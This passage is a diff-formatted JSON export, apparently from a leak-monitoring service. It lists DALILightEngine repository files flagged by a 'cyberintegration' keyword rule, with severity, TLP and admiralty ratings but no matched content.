"info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "263a023e5d8ccf8f7a51ebccdab85789e54b36b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a90d7771125101ec8b7945af1cb3bc6893422415", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6125166b747f04d722a1dff9f33b3f8c0ed5e464", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f6d88cf41619077e82aa8f4ee1b14f8f574d3c14", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed65c6fc60f553d1e615aaae88c703bdd2c88018", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2fddb61d4c3819547e5b75f47d0d25fa6dc7ed9", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "752909a54ba4a307cfc378fd5d684f8844350a4b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03d3943d397c38da04e243bb254ad1816c48b82f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "321f4ee9985a4cbe47b6f5d726b2038619892635", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a03fda2495554a0d469dba2597b804a3cc9eb3a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "eabe4eeaf27e013ab8f8bf55d00d3ce2b22a6050", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5dee459468203f7f64a3f51530f815efefa32ce2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f8ea3160bba241d069f2b75b9cadf771c470422e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a6884161524d8816a8c0e63b1fa2801002670067", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f132712729ac8da9e0856099142918addee0403a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c374b2a1dadea76a3c8ab1943e3e51bd399ff07d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "da1448fad155214bd78242f813bffc16619fbf0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a82b2a96e8b268d47f1d9c168e7da1a1c0fc266e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c9114f8944effde90b37025b139322b764240b1a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c3dff850813cec01ee2231ffa6a8c5ab777f452a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f01461df25f20aeb39768972c83204386379c990", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6d44144be20f53cf85c849c1d3c13e9e2cda1038", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2b4ca2c4d910c2edb54d45b5d2587d5953a11bb0", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a562ff0bbe9883f032009c7b7848848761258e4f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "340ef96ad17c275de5e3868fdd3d67a2aadd87be", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "091ebb041384788d677b3e6d864d8f8bce2cf7b8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b00fd9faa47a0e87f4c9f6b79a7d5955a9d45074", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/DebugManager/DebugManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/DebugManager/DebugManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c2afd5748c47cf4242397e03d8d82c16db464028", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ManufInfo/ManufInfo_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ManufInfo/ManufInfo_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "e5dc3ab3034b5035c3892510c6e17292126414c5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5468e3536fa7b3f63c67c1f8ebe32cb062f35a0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + 